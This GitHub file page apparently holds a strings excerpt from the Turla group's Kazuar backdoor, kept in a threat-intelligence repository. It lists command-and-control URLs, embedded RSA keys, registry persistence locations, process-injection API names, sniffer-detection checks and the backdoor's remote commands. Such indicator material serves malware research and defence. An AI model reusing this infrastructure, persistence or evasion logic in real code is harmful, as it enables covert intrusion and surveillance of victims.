Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
turla_toolkits/2019-01-28_Turla_kazuar_config_excerpt.conf
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
290 lines (290 sloc)
13.6 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Fatal failure due to {0}: | |
| Kazuar's {0} started in process {1} [{2}] as user {3}/{4} | |
| entry point | |
| loader service solver sender singler scripter Data signature is invalid | |
| RSAKeyValue><Modulus>m4SbvlZhH5UzcgDLIEIygjTCCQMxc/TrwUYZ5JA5SU2jtSBt9aqwljKJ7h4Tv5eP2Efy4Z+2QajDNtOThift4nVTWsl+iOoMKKV6pvQOFj6k2P4kRTBGo/t8J46j7DqnFeMHXUjhjv2RFnp1nms8thE6+MJsI0lnxYTLBip5mNbj+Jbr7vVzK8MKnjGxsr9FoRBVNyZM+ILFu3aO62z1a8PIrI4kqVVggD35oF4WdSrmVLFvec/1ej3Cx12NjqCXo3lZhwxlIKjFNMNtslXnk0o9L/ZlWlEjqXiez/3ryzpVBrlrtb9D+x1ZRtv58jtdSTE61//jtEb3mMUeTry+2w==</Modulus><Exponent>EQ==</Exponent></RSAKeyValue> <RSAKeyValue><Modulus>gSI+OxtBrfXVfSRRSlNIMVYr9HFy40jokIDkUqffhU7Y/VcFB1nc8GwT4GOjK6lR/mJi3XcGg+nxqR9iLoeoOLgBFFz9O1l++81tPtRaVZ8yg+IzmZlaMhdOg0apatxhjRA/4pYOhZHwifQIjZzid6/+BgYIPBXWcX8e58l1PH+chm3DJzJ2gdHOsx6Dz9HHPr+sGLshAFF35ICb/11jq0vU9KU7CjYdf0Rvl16EDYyUQXbIG1ZMaTDzBrMcXZrBfXHEqn2Qwr4NiaDUwOwGCynBtSZXoNOfHArYxbRaBA269SPKhZgCBqdAhYfPFe2q8r8Y4fz21iZTqTngMsA2zw==</Modulus><Exponent>EQ==</Exponent><P>hGjs2pEZW4pN2b0Bm9xl84zxqQ2BMSflj2xpf5MH+XvCY5BBN3YROm24LYtGwy3xOdKeUJOENvYbkvirBcm2ecRxmLgE5AMMeWxZpOayUtOUd+Abx3+TT8giPG3sqEHtuaHVUjypBloE4EWnFWrmq0f3+Kpi8kHFxLul9jHubsc=</P><Q>+ap/8gRvidWrAhZcAiCAYdFZIt6hSwBz5ohU5ZSPomv9e/Urtts8cin+QeBvDwF6UvyP1vz3wxUOXycaBI3StCMjCXHuBLN+wfpEhfdt6KKywsmW7I5OdogIbVRLTUJvBtiXBGG3c10ay3H8TYx00lt6GgcLAJZMZE4mHEjnj7k=</Q><DP>D5PfoT4/N/InRsrxIWU5K7Y6jFvxFNeEaznuSz55aKUl7ZiAJKR6f1gzyR9xvJv+Qwm4RbcAfu/HAjtfahe7HWJnt50twHjUSoU3uQwU+q964O0wcdLGCWLW2e7QjEP92ZqRkTRQHt1p/ERuAoUMFCaVpMjAWLxxnqyqHPbQwb0=</DP><DQ>vuvLQJn68O6v8omRp0YH0lTLsUDVsdMrdA3mkXGbA7v+E38/i9TT3tTRfaugOKbG9CqMHN+QSeLs31oi9Gxz8yntnc+X5XozwYMlV2Lbk8e14D/Nw/RaHmgGcbjuSiO+UIeCiuFQDOzYQTkMO01KRoIwMgVixDay40rR2WTtT8k=</DQ><InverseQ>cfVixwsMog8F8CDikcYKNmUGNJPeJ4grdJi4ZIMX5mSuhdvSccTnx7JoCMJ2LKwFLyMnmZIIeYF4EYBgwHz6rumL8Zam6Zr04uIpxWL3MZyR9BImREmH6e6aFzHq/P02phU6tNbzkHMp6QGsfgtkLSmzOed0GsvfwAxCfD20PXU=</InverseQ><D>PMTR/bJ5Qs4KHMXL5r3Hnr8jvlOBW+YTFtM+RQO0evftpGUviv0crWAJWok9ujGP/z1bs4NOXDHbImkfJPSLZfw8vknglGZZ3+gzaNxmvuGBLwEJOTkbYt3KmCFAqsIPyemHebAG1XHam0WprA2Xv9pZbD8S7xlV2w6lIcg3K4ak6tNG2yKepoQ2DvFdF/ZTtOu0ybE+g8AA6UxWCy/liTLN2fxgVwP45XAAFIue/x6aF6m09gxi/xJaxwafEeonVZU9aaqpbyb5eeMixRSbkVuK2DZrF/lW9oedp0mYtI+E7nRyxykxFl3rrC9B8ETKBzNONPgB4PpuaSSdC0ELcQ==</D></RSAKeyValue> 9 | |
| https://www.northviewcanada.com/wp-content/galler/slider/ = https://www.zycie-chotomowa.pl/wp-content/languages/index.php - | |
| DISABLED http://*:737/ | |
| iexplore firefox browser outlook chrome nlnotes notes2 opera msimn | |
| 169739e7-2112-9514-6a61-d300c0fef02d => B | |
| Global\{0} | |
| singleton-instance-mutex | |
| Second instance. | |
| old | |
| wscript | |
| cscript | |
| single install COMSPEC SHELL | |
| cmd.exe | |
| bin/bash | |
| dbgview.exe C | |
| perf|ms|sec|srv|man|mon|log|ctl|cnt|sys|upd|nv|pnl|fl|ad|int|jv|amd | |
| perf ms sec srv man mon log ctl cnt sys upd nv pnl fl ad int jv amd | |
| Performance Microsoft Security Service Manager Monitor Logging Control Counter System Update Nvidia Panel Flash Adobe Intel Java AMD base N # | |
| select * from Win32_OperatingSystem | |
| OSArchitecture | |
| InstallDate {0}{1} ({2}) {3} Caption 32-bit Version {0} {1} {2} {3} û E | |
| Mozilla/5.0 (Windows NT {0}.{1}; rv:22.0) Gecko/20130405 Firefox/23.0 ? | |
| Mozilla/5.0 (X11; {0} {1}; rv:24.0) Gecko/20100101 Firefox/24.0 | |
| dd.MM.yyyy HH:mm:ss (zz) [{0}] {1} | |
| 0}.{1:D2}:{2:D2}:{3:D2} {0:D2}:{1:D2}:{2:D2} {0:D2}:{1:D2} ??? | |
| ### EB | |
| ### PB | |
| ### TB | |
| ### GB | |
| ### MB | |
| ### KB {0} B | |
| Unhandled exception {0} | |
| 0:0000}-{1:00}-{2:00}-{3:00}-{4:00}-{5:00}-{6:000}.{7} A Z z res tsk cols |{0}| | |
| 0}| | |
| 0} | | |
| 0}$ 72C24DD5-D70A-438B-8A42-98424B88AFB8 | |
| CreateShortcut | |
| TargetPath | |
| IconLocation | |
| WorkingDirectory | |
| Description Arguments Save | |
| ustar 00 | |
| unknown/unknown {0} | |
| 0} -> {1} {0} doesn't exist! | |
| ERROR: {0} {0:00}:{1:00}:{2:00}.{3:000} | | |
| systlog.txt | |
| userlog.txt | |
| tasklog.txt | |
| Task #{0} failed due to {1} | |
| system PUT | |
| Task #{0} execution started: | |
| user - {0}/{1} ({2}) proc - {0} [{1}] | |
| time - {0} Task #{0} execution finished. | |
| tran # Using default transports due to {0} % Unable to store transports due to {0} | |
| serv Using default servers due to {0}" Unable to store servers due to {0} | |
| uuid! Using default agent id due to {0} # Unable to store agent id due to {0} | |
| intv! Using default interval due to {0} # Unable to store interval due to {0} | |
| cont* Unable to get last contact time due to {0} | |
| arun% Using default autorun type due to {0} ' Unable to store autorun type due to {0} | |
| remo$ Using default remote type due to {0}& Unable to store remote type due to {0} | |
| storage | |
| 0} | {1}a-zA-Z0-9 ]*$ ( | |
| Transport process name '{0}' is invalid.( sdsadsadsa | |
| Control server address '{0}' is invalid. | |
| Invalid sender interval. | |
| Invalid last contact time. X16 | |
| 0} [{1}]: single HKCURUN - SOFTWARE\Microsoft\Windows\CurrentVersion\Run | |
| RUNONCE 1 SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | |
| LOADKEY load4 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | |
| POLICIES? SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | |
| WINLOGON Shell explorer.exe, {0} 5 | |
| SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | |
| STARTUP | |
| shell32.dll, 3 .lnk Startup path is empty. Ð Autorun failed due to {0} ) | |
| '{0}' autorun algorithm is not supported! | |
| HTTP listening isn't supported. | |
| Remote failed due to {0}" | |
| Remote iteration failed due to {0} ˆ | |
| Remote control failed due to {0} | |
| OPTIONS | |
| POST | |
| GET ) | |
| Remote request from {0} failed due to {1} OK Got new task #{0} from {1}. | |
| Got '{0}' command from {1}. % '{0}' request method isn't supported. | |
| status Access-Control-Request-Headers Access-Control-Request-Method | |
| Origin Access-Control-Allow-Headers Access-Control-Allow-Methods Access-Control-Allow-Origin Access-Control-Allow-Credentials | |
| true Vary Accept-Encoding, Origin text/xml; charset=utf-8 È | |
| continue Result #{0} was taken by {1}. file | |
| 0:X16}.res | |
| *.tsk ftp ftps STORâ RETR NLST .tsk DELEú | |
| Invalid FTP server status ({0}). http https AuthToken | |
| Scheme '{0}' is not supported! Send iteration failed due to {0} No servers available now. , | |
| Unable to send result #{0} to {1} due to {2}& Unable to get task from {0} due to {1} | |
| Sending result #{0} to {1}... | |
| Result #{0} was sent to {1}. | |
| Sending request to {0}... | |
| Request was sent to {0}. | |
| megadumper smartsniff snoopypro wireshark ethereal tcpview tcpdump windump portmon dsniff | |
| Sniffer found: '{0}'! | |
| ipc://{0}/{1} | |
| IPC channel is not ready. # | |
| Failed to create channel due to {0} $ | |
| Failed to create injector due to {0}! | |
| Failed to create agent due to {0} | |
| portName authorizedGroup chan shar Got new '{0}' command. $ | |
| Unable to execute command due to {0} Unable to return logs due to {0} | |
| Solving task #{0}... | |
| Task #{0} solved. | |
| KAZU& Unable to execute task #{0} due to {1} * | |
| Unable to delete task #{0} file due to {1} ' | |
| Shell_TrayWnd | |
| LoadLibrary | |
| HookProc@12 | |
| HookProc | |
| GetProcAddress | |
| SetWindowsHookEx | |
| UnhookWindowsHookEx | |
| RtlCreateUserThread | |
| WaitForSingleObject ¬ | |
| NtCreateSection < | |
| Waiting for window '{0}' failed. | |
| PostMessage | |
| Waiting for shellcode failed. | |
| NtMapViewOfSection | |
| Qmchftgcnsksporjfdcn | |
| dll | |
| OpenProcessToken | |
| GetTokenInformation | |
| GetSidSubAuthority | |
| DuplicateTokenEx | |
| winsta0\default | |
| CreateProcessAsUser | |
| explorer | |
| OpenProcess | |
| Injecting into {0} [{1}]... | |
| Injecting into explorer... | |
| Injected into {0} [{1}]. | |
| Injected into explorer. ' | |
| Process {0} [{1}] exited with {2} code. | |
| Shellcode error {0:X16}. | |
| Injection failed due to {0} | |
| Run-time error {0}:{1}. | |
| Run-time error {0}:{1:X8}. t | |
| Injection loop error at [{0}:{1}] due to {2}¬ | |
| Process {0} [{1}] impersonated. * | |
| Unable to impersonate {0} [{1}] due to {2} | |
| New plugin {0} was installed. plg | |
| Plugin {0} was started. % | |
| Unable to start plugin {0} due to {1} $ | |
| Unable to stop plugin {0} due to {1} stopped working | |
| 0} is {1} | |
| Plugin {0} was removed. | |
| Plugin Name Stop Start ' Invalid or unknown action format ({0})! . | |
| Action with identifier {0} is not implemented. | |
| get ' Get command requires file query string! % | |
| Created date mismatch in get command! & Accessed date mismatch in get command! & Modified date mismatch in get command! | |
| Getting file query {0}... | |
| {0} was skipped. | |
| put ' Put command requires correct file path! | |
| Put command requires payload! Putting file to {0}... | |
| payload | |
| cmd * Cmd command requires actual commands list! | |
| Executing command with {0}... | |
| sleep | |
| Sleep interval is longer than supported! | |
| Going to sleep for {0}... upgrade ! | |
| Upgrade command requires payload! | |
| Upgrading agent... scrshot | |
| Taking screen shot... Ì jpg camshot | |
| Taking webcam shot... WebCapt € à | |
| Unable to create capture window. | |
| Image is empty. ! | |
| Uuid command requires identifier! | |
| Setting agent id to {0}... D | |
| interval* Max interval value is less than min value! * | |
| Min interval value is less than supported! * | |
| Max interval value is more than supported! , | |
| Setting transport interval to [{0} - {1}]... | |
| server , Server command requires at least one server! Setting transport servers: o {0} | |
| transport 5 Transport command requires at least one process name! Setting transport processes: | |
| autorun 0 Autorun command requeres autorun type to be set! Setting autorun type to {0}... | |
| remote Setting remote type to {0}... | |
| info Getting system information... | |
| Agent information | |
| Information type | |
| Information value | |
| Agent identifier | |
| Executable path | |
| Storage path | |
| Fake visible name | |
| Description label | |
| Machine seed | |
| X8 | |
| Parallel tasks | |
| Last contact | |
| Autorun type | |
| 0} - {1}] | |
| Transport interval | |
| Command servers | |
| Transport processes | |
| System information | |
| Computer" | |
| select * from Win32_ComputerSystem | |
| Manufacturer | |
| Model | |
| Motherboard | |
| select * from Win32_BaseBoard | |
| Processor | |
| select * from Win32_Processor | |
| BIOS | |
| select * from Win32_BIOS | |
| Video controller# | |
| select * from Win32_VideoController | |
| Disk drive | |
| select * from Win32_DiskDrive | |
| CDROM drive | |
| select * from Win32_CDROMDrive | |
| Network adapter " select * from Win32_NetworkAdapter | |
| Operating system Framework version | |
| Command shell | |
| Machine name | |
| System directory | |
| Current culture | |
| UTC time | |
| Local time | |
| Computer uptime | |
| User information | |
| Full name | |
| Authentication | |
| Local groups and members | |
| Group Member , | |
| select * from Win32_Group where Domain='{0}'Z | |
| select * from Win32_GroupUser where GroupComponent = "Win32_Group.Domain='{0}',Name='{1}'" | |
| PartComponent Name= " | |
| Installed software Product Publisher ? | |
| SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall 3 | |
| SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Special folders S | |
| pecial folder name | |
| Folder path | |
| Environment variables | |
| Variable name | |
| Variable value | |
| Network adapters | |
| Identifier | |
| Speed | |
| MAC address | |
| Type Received Sent DHCP DNS Gateway Anycast Multicast Unicast Active network connections Local address | |
| Remote address State TCP --- Listening UDP | |
| Logical drives | |
| Drive name | |
| Drive label | |
| Root directory Format | |
| Total size Free size Running processes PID PPID User | |
| Start time Session | |
| Command line select * from Win32_Process GetOwner {0}\{1} ProcessId ParentProcessId | |
| CreationDate SessionId | |
| CommandLine ps % -eo comm,pid,ppid,user,start,tty,args | |
| Opened windows Process ÿ Directory listing for {0} | |
| Path Size Created DIR FIL | |
| information | |
| User roles | |
| User groups | |
| DisplayVersion | |
| DisplayName | |
| copy" Copy command requires source path! ' | |
| Copy command requires destination path! ¬ | |
| Copying file from {0} to {1}... | |
| move" | |
| Move command requires source path! ' | |
| Move command requires destination path! | |
| Moving file from {0} to {1}... | |
| remove " Remove command requires file path! Removing file {0}... (_._) | |
| findir ( List command requires file query string!& | |
| Created date mismatch in list command! ' | |
| Accessed date mismatch in list command! ' M | |
| odified date mismatch in list command! | |
| Searching file query {0}... S | File creation time: | File modification time: | File size: | | |
| File path: | {0} | {1} | {2} | {3} | |
| kill1 Proc kill command requires name or pid to be set! | |
| Killing processes... {0} [{1}] tasklist Listing processes... suicide Commiting suicide... | |
| plugin Plugin command requires payload! Installing plugin... Plugin installed. | |
| plugout , Plugout command requires plugin name string! Removing plugin... | |
| Plugin removed. pluglist Listing plugins... | |
| Plugin {0} | |
| run % Run command requires executable path! " | |
| Running executable {0} with {1}.. |